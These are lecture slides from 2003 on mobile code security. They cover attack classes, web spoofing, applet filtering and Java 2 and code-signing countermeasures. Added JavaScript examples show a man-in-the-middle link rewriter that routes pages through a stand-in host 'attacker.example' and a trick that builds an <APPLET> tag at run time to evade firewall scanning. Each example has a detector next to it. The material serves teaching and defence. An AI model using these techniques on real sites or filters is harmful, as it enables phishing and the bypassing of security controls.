Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.


Page 1: Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.

Mobile Code and Worms

By

Mitun Sinha

Pandurang Kamat

04/16/2003

Page 2:

Mobile Code

And Mobile Code Security

Page 3:

Part I

What is mobile code?

Page 4:

First, What Is Code?

And how is it different from data?

Code is a series of commands, and (usually) contains little or no information of its own.

Code can be executed, and running code most often requires some outside information (data) to work on.

Programs, applications, operating systems, games, calculators, media players, word processors and viruses are examples of code.

Resumes, pictures, videos, music, lists of numbers, and your ex-girlfriend’s social security number are examples of data.

Page 5:

Enter the Internet

Today, we constantly download or make web pages, movies, music and pictures, then send them to friends and family. Data has definitely been successfully mobilized.

If I download Half-life, install and play it on my computer, then FTP it to a friend so he can install and play it*, could we then say that Half-life counts as mobile code?

* Legal battle with Sierra sold separately

Page 6:

Mobile code is…

a general term used to refer to processes (executable code) that migrate and execute at remote hosts

any code that is specifically designed to be able to transport itself from one machine to another

Page 8:

Mobile code is…

able to transport itself

fairly autonomous

often platform-independent

code that is moved from one host to another with or without interaction with the user

Page 9:

Examples of mobile code

Java applets and JavaScript

ActiveX controls

Visual Basic macros and scripts

Dynamic e-mail

Viruses, trojan horses, worms

The agents in The Matrix

Page 10:

What is mobile code good for?

Instead of moving large amounts of data around, move the computation to the data.

Add functionality anywhere, anytime

Make distributed systems simpler, more flexible

Natural for network software

Page 11:

Every rose…

What is the problem with mobile code?

SECURITY

Page 12:

Part II

Mobile Code Security

Page 13:

A Tale of Two Problems

Malicious Code Problem

Malicious Host Problem

Page 14:

Malicious Code Problem

Mobile code that arrives at your workstation and intentionally or unintentionally causes you harm

Four attack classes:
– invasion of privacy
– denial of service
– antagonism
– system modification

Page 15:

Example?

Antagonism
– meant to annoy or show off
– no real damage to files or system
– display of unwanted graphics or text

System modification
– deletion of data or system files
– capturing hard drive space, e.g. to host a shareware server

Page 16:

Example?

Invasion of privacy
– read surfing history
– read directory listings
– steal files

Denial of service
– re-aim browser
– stealing CPU cycles
– Web spoofing

Page 17:

Web Spoofing - example

Steal control of the user’s view of the web and simulate normal operation

Classic man-in-the-middle attack
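The rewriting step that gives the attacker control of the user’s view, as an added example (not code from the slides): the spoofing server fetches the real page and rewrites every absolute link so the victim’s next click also goes through it, together with one defender-side check for that rewriting. The attacker host "attacker.example", the sample bank page and the detector are constructed for this demo.

```javascript
// Added example (not code from the original slides): the URL-rewriting step of a
// web spoofing attack, and a defender-side check for it. The attacker host
// "attacker.example", the sample bank page and the detector are all constructed
// for this demo.

const ATTACKER = 'http://attacker.example/';

// Attacker side. The spoofing server fetches the real page and rewrites every
// absolute href/src so the victim's next request also passes through it; the
// attacker stays in the middle while the page looks and works as usual.
// Relative links need no rewriting: the browser resolves them against the
// attacker's origin, which already routes back to the attacker.
function rewriteLinks(html, attacker = ATTACKER) {
  return html.replace(
    /\b(href|src)=(["'])(https?:\/\/[^"']+)\2/gi,
    (_m, attr, quote, url) => `${attr}=${quote}${attacker}${url}${quote}`,
  );
}

// Defender side. A rewriting proxy leaves a tell-tale: links whose path is itself
// a complete URL (http://proxy/http://real-site/...). Returns the offending links.
function nestedUrlLinks(html) {
  const found = [];
  const re = /\b(?:href|src)=["'](https?:\/\/[^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (/^https?:\/\/[^/]+\/https?:\/\//i.test(m[1])) found.push(m[1]);
  }
  return found;
}

// Constructed sample page, as the real site would serve it.
const ORIGINAL_PAGE =
  '<html><body>' +
  '<a href="https://bank.example/login">Log in</a>' +
  '<img src="https://bank.example/logo.png">' +
  '<a href="/help">Help</a>' +
  '</body></html>';

// What the victim receives from the attacker instead.
const SPOOFED_PAGE = rewriteLinks(ORIGINAL_PAGE);
```

The detector only catches this particular rewriting scheme; the attack as described also uses script to keep the status bar and location line showing the expected URLs, so the rendered page cannot be trusted to reveal the proxy. The durable check is the server certificate presented over HTTPS, not anything inside the page.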

Page 18:

Mobile code is smart

A firewall attempts to “block” Java in HTML by scanning port 80 (the HTTP port) for the <APPLET> tag

JavaScript in the page can construct the <APPLET> tag at run time, after the page has passed the firewall, so the literal tag never appears on the wire
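The evasion on this slide, worked through as an added example (not code from the slides): a filter that pattern-matches the HTTP body for <APPLET>, a page that assembles the tag at run time, a minimal model of the browser executing that script, and one wire-level check that does not depend on the HTML at all. The pages and the browser model are constructed for this demo.

```javascript
// Added example (not code from the original slides): a firewall filter that
// pattern-matches the HTTP body for <APPLET>, next to a page that assembles the
// tag at run time. Pages and the browser model are constructed for this demo.

const APPLET_TAG = /<\s*applet\b/i;

// The firewall as the slide describes it: look for the tag on the wire (port 80).
function firewallBlocks(httpBody) {
  return APPLET_TAG.test(httpBody);
}

// Page 1: the tag is literal, so the filter sees it.
const PLAIN_PAGE =
  '<html><body><APPLET code="Evil.class" width=1 height=1></APPLET></body></html>';

// Page 2: the bytes "<APPLET" never cross the wire; the browser builds them.
const EVASIVE_PAGE = [
  '<html><body><script>',
  'var t = "APP" + "LET";',
  'document.write("<" + t + " code=\'Evil.class\' width=1 height=1></" + t + ">");',
  '</script></body></html>',
].join('\n');

// Minimal model of the browser: run each inline script with a document.write
// that splices its output into the page where the script stood.
function asRendered(html) {
  return html.replace(/<script>([\s\S]*?)<\/script>/gi, (_m, js) => {
    let written = '';
    const doc = { write: (s) => { written += s; } };
    new Function('document', js)(doc);
    return written;
  });
}

// A wire-level check that does not depend on the HTML: the applet's own class
// files must still be fetched, and every Java class file starts with the magic
// number 0xCAFEBABE. (Caveat: classes packed in a JAR are deflated, so the magic
// is only visible if the filter also unpacks archives.)
function looksLikeClassFile(bytes) {
  return bytes.length >= 4 && bytes.readUInt32BE(0) === 0xcafebabe;
}
```

The general lesson: a signature match on the wire sees a different representation than the one the client executes. Any check on mobile code has to run on the representation the client actually interprets (here, after script execution), or on something the attacker cannot disguise without breaking the payload, such as the class file magic number.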

Page 19:

Counter-measures

Page 21:

Microsoft’s security (Yeah right!)

Internet site zones of trust

ActiveX control signing and marking

Macro signing

Attachment warnings

Page 22:

SUN’s JAVA 2 Security

Identity
– Origin (where the code was loaded from)
– Signature (who signed it) – not the same as origin!

Policy
– Set by user(!!) or system administrator (still bad)

Good ol’ Sandboxing

Signatures are based on X.509v3 certificates
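How origin and signature enter the policy, as an added illustration (not from the slides): a Java 2 policy file in the syntax the JDK’s java.policy file uses, with an assumed keystore path, hostname and signer alias, showing that codeBase (origin) and signedBy (signature) are separate identity dimensions that a grant can use alone or together.

```text
// Assumed keystore holding the signer's X.509 certificate under the alias "acme-release".
keystore "file:/etc/java/signers.jks";

// Identity by origin only: any code loaded from this host, signed or not,
// may open sockets back to the host it came from.
grant codeBase "http://applets.example.com/-" {
    permission java.net.SocketPermission "applets.example.com", "connect";
};

// Identity by signature only: whoever signed with the "acme-release" key is
// trusted to read this directory, no matter which host served the code.
grant signedBy "acme-release" {
    permission java.io.FilePermission "/tmp/acme/-", "read";
};

// Both together: the strongest grant requires the code to come from the
// named host AND carry the named signature.
grant signedBy "acme-release", codeBase "http://applets.example.com/-" {
    permission java.io.FilePermission "/tmp/acme/-", "read,write";
    permission java.util.PropertyPermission "user.home", "read";
};

// Code matching no grant entry gets only what the system policy file grants
// to all code, i.e. it stays in the sandbox.
```

Because the policy is data the user or administrator edits, a single over-broad grant (a signedBy entry with no codeBase, or a codeBase of "http://-") silently extends trust to every piece of code that matches it, which is the “still bad” the slide refers to.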

Page 23:

Verisign Digital Signing

Trusted third party that allows developers to digitally sign their code

Consumers can know that signed code came from the identified developer and has not been altered or tampered with since signing – IF they trust the third party. A signature says who published the code, not that the code is harmless.

Page 24:

Verisign Digital Signing

Verisign works with:
- Microsoft Authenticode and VBA
- Netscape Object Signing
- Sun Java signing

Techniques used include industry-standard cryptographic methods learnt in class – like RSA and PKI

Page 25:

Questions?